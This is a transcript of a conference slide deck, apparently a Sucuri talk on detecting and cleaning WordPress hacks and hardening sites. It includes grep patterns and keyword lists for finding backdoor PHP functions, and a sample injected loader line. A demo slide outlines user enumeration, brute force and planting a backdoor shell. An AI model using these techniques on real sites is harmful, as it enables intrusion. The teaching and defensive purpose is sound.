WordPress Security - Dealing With Today's Hacks

WordPress SecurityDealing with Today’s Hacks

04/11/2023@sucuri_security @perezbox #wclv

SUCURI@WORDCAMP# WHOIS PEREZBOX

ID: Tony Perez

WHO: The Hulk

Username: Perezbox

Process: Sucuri

Services: InfoSec, Harley’s, MMA, Guns

GeoIP: Menifee, California


Why listen to me? You don’t have to, but…

I am not a designer or developer, my passion is Information Security, specifically Web Security

Not an expert, passionate enthusiast

I don’t like people, I like packets, signatures and terminal.

Seriously though, our company:Remediate 200 – 300 infected websites a day,

24/7/365

Perform 2 million + malware website scans a month

Support all CMS platforms and customapplications (e.g., WordPress, Joomla, osCommerce, vBulletin, Drupal, .NET, etc… )


Thoughts To Kick Things Off

Information Security is about risk reduction.

If you’re looking for the “silver bullet” this is the wrong talk for you.

To think that you will never be infected or that you are immune to hacks is like saying you will never be sick.

If someone tells you the opposite you should slap them and have them pay you for wasting your time.

Prevention is ideal, detection is key… bats were created for ________ people…


Know Your EnemyThey have more time and resources

They are intelligent

Majority of attacks are automated

Goal is to impact as many people as possible

Mindset – Own one, own them all…

It’s not personal, it’s business…


Ok, so what’s the problem?

TODAY’s ISSUES:

The Ecosystem / Environment

Access Control

Software Vulnerabilities

Administration

Credential Management

Extensibility


Today’s Focus

Ecosystem / Environment

Access Control

Dealing with Hacks


The EcoSystem / Environment

ApacheMalicious module injects iFrames

http://blog.unmaskparasites.com/2012/09/10/malicious-apache-module-injects-iframes/

phpMyAdminMirror Hacked

http://sourceforge.net/blog/phpmyadmin-back-door/

PHP-CGIRemote Code Execution

http://blog.sucuri.net/2012/05/php-cgi-vulnerability-exploited-in-the-wild.html

PleskVulnerable to SQLi attacks

http://blog.sucuri.net/2012/06/plesk-vulnerability-leading-to-malware.html











Uh, what about WordPress?


Logical Architecture

Linux Operating System

Apache

WordPress CPANEL Plesk phpMyAdmin PHP-CGI

MySQL

Modules

PHP

Modules


The EcoSystem / Environment

What can you do?Not much… completely outside of your control if you’re using a shared or managed host

But, you can reduce risk...Use a Dedicated / VPS Environment

But recognize the responsibility that this entails, if you what I mentioned previously doesn’t make sense, skip to next step

Go with a Managed HostDoesn’t mean you’ll be safer, but it does mean you’ll have resources to lean on


Access is Key

On the Server:Kill accounts that are not in use

FTP is the devil – slap yourself and switch to SFTP

Filter Shell / SFTP by IP & Keys, Keys at a minimum

Disable Authentication via Passwords on server

WordPress Admin:Multi-Factor Authentication on wp-admin

Apache “Basic Access Authentication”

Two-Factor Authentication on wp-login.phpDuo Two-Factor Authentication Plugin

Employ least privileged:Users with the “administrator” are not needed for every day tasks

Learn to use Editor, Author, Contributor, Subscriber


Gah!?!?!?!?!?!?!


WordPress Loving Infections

Defacements

Backdoors

Pharma Hack

InjectionsiFrame Specifically

Malicious Redirects

Phishing


Before We Dive In

LINUX / UNIX:CURL

FIND

GREP

DIFF


Command Usage – Hunting TimThumb

# grep -Eir --include "*thumb.php" 'define.*VERSION' .

- Then –

# curl -D - -A "Windows" http://timthumb.googlecode.com/svn/trunk/timthumb.php>/path-to-file/timthumb.php


Command Usage – Identify Change

Detect Recent Changes

find -type f -ctime -0 | more - OR - find ./ -mtime -1

-ctime = -0 (past 24 hours) | -1 (last 24 hours)

-mtime = -1 (1 day) | -2 (2 days)

Detect Differences

diff –qr /path/dir1 /path/dir2


DefacementsHacktivism at its finest… you now support a cause!?!?!


Defacements

Hacktivism 101Annoying as S*&T

Places to look:Index.html

Index.phpRoot Directory

Wp-Content

Theme Directory

GREP is your friend:grep –ri ‘sniper399’ .


BackdoorsIt’s ok to cry a little…


BackdoorsCommon terms:

Is_bot

Eval

Base64_decode

Fopen

Fclose

readfile

Edoced_46esad

Exec

System

Shell_exec

Gzuncompress

popen

FilesMan

grep -RPl --include=*.{php} "(system|exec|passthru|shell_exec|base64_decode|eval|) *\(" /var/www


Pharma HackErectile Dysfunction pills are leading ads.. Who knew..


Pharma HackMulti-million $ Business

Rarely Distribute Malware

Impression based Affiliate Marketing

Google’s Search Engine Result Pages (SERP)

Odds of malware distribution are actually low

Tricks:Embedded within core files

Look for “.tmp” directories = >


Pharma Hack, cntd..

Try using CURL to emulate Google and Windows:Curl –L –A “Googlebot/2.1(+http://www.google.com/bot.html)” http://someinfectedwebsite.com

Google Webmaster ToolsFetch as Google Bot

Check your Theme Index.php file for things like this:

<?php $wp__theme_icon=@create_function(”,@file_get_contents(‘/public_html/wp-content/themes/my-really-good-theme/images/s.jpg’));$wp__theme_icon(); ?>

http://someinfectedwebsite.com/


Pharma Hack, cntd..


InjectionsIt only hurts for a minute…


Injections

Invisible iFrame’s - Executing on your browser

Contributing to Drive-by-Downloads, Pharma, XSS, CSRF

Places to check – Pages that generate content:JS files, Header.php, Index.php, Function.php, Footer.php


Injections, cntd…

PHP iFrame Injection =>Count##.php

Check all Index.php / Theme JS files

Example below:


Injections, cntd…

Pharma Link Injections =>

Drive-By-Downloads


Malicious RedirectsWTF?!?! Why don’t I understand what it says?


Malicious RedirectsRedirects your user to a domain distributing malware, fundamentally different than an ifram injection that executes in your browser

8 out of 10 times, check your .htaccess file – all of them# find /var/www –name .htaccess –type f | wc –l

Check for backdoors also – often a sign of a bigger issue


PhishingBiggest growing problem, exceptionally difficult to detect…


Phishing

Growing at a faster pace than traditional web-malware

No impact to readers, but tied to SPAM bots sending out emails like this:


Phishing, cntd…


DemonstrationBringing the Point Home


Demo Objective

Use good tools for bad things – wpscan

Enumerate the users

Brute Force the User accounts password

Insert an arbitrary Backdoor Shell for Remote Execution

Deface the Website

Insert another Shell Backdoor that provides an interface

I have 5 minutes – Ready?


Keeping it RealRemember the risk discussion?


Guard AccessRevisit Slide 12 – access, access, access

It always comes down to access

We have to change the way we treat and think about access. All access – Server / Application

We are going through the same mistakes servers and desktops were making in the 90’s with access.

Know where you are surfing the web, do you really need to log in as an admin at the coffee shop?


Password Dilemma15 character pass

3 months to crack

Long / Complex / UniqueKey to Passwords

Prefer Password ManagerYou don’t? ok..

Passphrases work tooiLuvWCLVegas:2012:HrtAttckGrll

Come up with a process that works, stick to it:

One scheme:Remember 8 characters

Write Down 8 characters

Save 20 characters

Second scheme:Remember 20 characters

Prefix characters with site name

End sequence with some date


Kill PHP Execution

Kill PHP Execution Directories:

WP-INCLUDES

WP-CONTENT

UPLOADS – At a minimum

<Files *.php>

Deny from all

</Files>


Disable Theme / Plugin Editor

I’d take it a step further and remove the ability to install, but that’s just me.

Modify WP-CONFIG.PHP With:

Disable the Plugin / Theme EditorDefine(‘DISALLOW_FILE_EDIT’,true);

- OR -

Disable the Plugin / Theme Update and InstallationDefine(‘DISALLOW_FILE_MODS’,true);


UpdateOldest version found in production – 1.5

Leading cause of cross-site contamination issues

Perhaps the simplest of tasks, yet we still find this:


Plugins That HelpClients

Sucuri Security Premium

Duo Two-Factor Authentication

Theme-Check

BackupBuddy

Akismet

Non-Clients

Duo Two-Factor Authentication

Limit Login Attempts

Theme-Check

BackupBuddy

Akismet


Sucuri Blog: http://blog.sucuri.net

SiteCheck Scanner: http://sitecheck.sucuri.net

Unmask Parasites: http://unmaskparasites.com

Perishable Press: http://perishablepress.com/category/web-design/security/

Secunia Security Advisories: http://secunia.com/community/advisories/search/?search=wordpress

Hacked – http://wordpress.org/tags/hacked

Malware – http://wordpress.org/tags/malware

BadwareBusters – https://badwarebusters.org

Need a Hand?

Support Forums Online Resources

http://blog.sucuri.net/

http://sitecheck.sucuri.net/

http://unmaskparasites.com/

http://perishablepress.com/category/web-design/security/



http://secunia.com/community/advisories/search/?search=wordpress



http://wordpress.org/tags/hacked

http://wordpress.org/tags/hacked

http://wordpress.org/tags/malware

http://wordpress.org/tags/malware

https://badwarebusters.org/

https://badwarebusters.org/


Sucuri

Tony Perezhttp://sucuri.net |

http://blog.sucuri.net

Twitter:

@sucuri_security

@perezbox and @tonyonsecurity

http://sucuri.net/

http://sucuri.net/

http://sucuri.net/

http://blog.sucuri.net/

WordPress Security - Dealing With Today's Hacks

Documents

Transcript of WordPress Security - Dealing With Today's Hacks